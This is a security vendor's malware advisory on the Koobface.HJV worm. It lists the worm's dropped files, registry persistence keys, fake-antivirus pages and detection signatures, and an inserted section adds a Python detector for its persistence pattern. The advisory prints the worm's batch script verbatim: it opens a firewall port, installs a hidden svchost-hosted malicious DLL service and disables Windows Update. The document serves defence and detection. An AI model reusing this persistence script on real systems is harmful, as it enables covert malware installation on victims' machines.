Koobface.HJV – Spreading in the wild (Feb 04, 2011)


The SonicWALL UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and, as part of its post-infection activity, installs fake AVG antivirus security software.

The Worm performs the following DNS queries:


The Worm attempts to load various web pages using random page names with the .css extension:


The Worm installs the following files on the system:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
  • C:\WINDOWS\5456456z
  • C:\WINDOWS\bt7.dat
  • C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
  • C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
  • C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

      netsh firewall add allowedprogram name="feb" program="C:\WINDOWS\system32\svchost.exe" mode=enable
      netsh firewall add portopening tcp 8087 feb enable
      sc create "ffeb" type= interact type= share start= auto binpath= "C:\WINDOWS\system32\svchost.exe -k ffeb"
      reg add "hklm\system\currentcontrolset\services\ffeb\parameters" /v servicedll /t reg_expand_sz /d "C:\WINDOWS\system32\feb.dll" /f
      reg add "hklm\system\currentcontrolset\services\ffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
      reg add "hklm\software\microsoft\windows nt\currentversion\svchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
      sc start ffeb
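
A static triage check for the persistence pattern in feb.bat, as an added example that is not part of the original advisory: it correlates the `sc create`, `ServiceDll` and `Svchost` group commands into a single finding and lists the firewall ports the script opens. The function name `analyze`, the regexes and the result layout are assumptions made for illustration; the sample input is the page's feb.bat with path separators restored.

```python
import re

# feb.bat as listed on this page, with path separators restored.
FEB_BAT = r'''
netsh firewall add allowedprogram name="feb" program="C:\WINDOWS\system32\svchost.exe" mode=enable
netsh firewall add portopening tcp 8087 feb enable
sc create "ffeb" type= interact type= share start= auto binpath= "C:\WINDOWS\system32\svchost.exe -k ffeb"
reg add "hklm\system\currentcontrolset\services\ffeb\parameters" /v servicedll /t reg_expand_sz /d "C:\WINDOWS\system32\feb.dll" /f
reg add "hklm\system\currentcontrolset\services\ffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
reg add "hklm\software\microsoft\windows nt\currentversion\svchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
sc start ffeb
'''

# Hypothetical patterns for this example; matching is case-insensitive.
SVC = r'hklm\\system\\currentcontrolset\\services\\'
RE_CREATE = re.compile(r'^sc\s+create\s+"?([^"\s]+)"?.*?binpath=\s*"([^"]+)"', re.I)
RE_HOSTED = re.compile(r'svchost\.exe\s+-k\s+(\S+)', re.I)
RE_DLL = re.compile(r'^reg\s+add\s+"' + SVC + r'([^\\"]+)\\parameters"'
                    r'.*?/v\s+servicedll\b.*?/d\s+"([^"]+)"', re.I)
RE_GROUP = re.compile(r'^reg\s+add\s+"hklm\\software\\microsoft\\windows nt'
                      r'\\currentversion\\svchost"\s.*?/v\s+(\S+)', re.I)
RE_PORT = re.compile(r'^netsh\s+firewall\s+add\s+portopening\s+(tcp|udp)\s+(\d+)', re.I)

def analyze(script):
    """Correlate the commands of a dropper batch file into findings."""
    created, dlls, groups, ports = {}, {}, set(), []
    for line in map(str.strip, script.splitlines()):
        if m := RE_CREATE.match(line):
            hosted = RE_HOSTED.search(m.group(2))
            created[m.group(1).lower()] = hosted.group(1).lower() if hosted else None
        elif m := RE_DLL.match(line):
            dlls[m.group(1).lower()] = m.group(2)
        elif m := RE_GROUP.match(line):
            groups.add(m.group(1).lower())
        elif m := RE_PORT.match(line):
            ports.append((m.group(1).lower(), int(m.group(2))))
    findings = []
    for name, group in created.items():
        # Flag a service that runs inside svchost.exe and whose ServiceDll
        # is set by the same script; note whether the host group is new too.
        if group and name in dlls:
            findings.append({"service": name, "service_dll": dlls[name],
                             "svchost_group": group,
                             "group_added_by_script": group in groups})
    return {"svchost_dll_services": findings, "firewall_ports_opened": ports}

if __name__ == "__main__":
    print(analyze(FEB_BAT))
```

A service that runs from its own executable, with no `svchost.exe -k` host and no `ServiceDll` value, produces no finding.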

feb.dll contains a list of URLs, all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URLs contained in feb.dll:


The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df "c:\windows\jjp156.exe"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB000 Service "feb"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):"\??\C:\WINDOWS\system32\drivers\feb.sys"

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

  • http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt


When clicking on “Remove all” or “Cancel” it attempts to initiate the download of:

  • bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

  • pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Koobface.HJV (Worm)
  • GAV: Koobface.HJV_2 (Worm)
  • GAV: Koobface.HJV_3 (Worm)
  • GAV: Koobface.FF (Trojan)
  • GAV: Delf.EM (Trojan)
  • GAV: TDSS.ABCR (Trojan)
  • GAV: SecurityTool.W (Trojan)
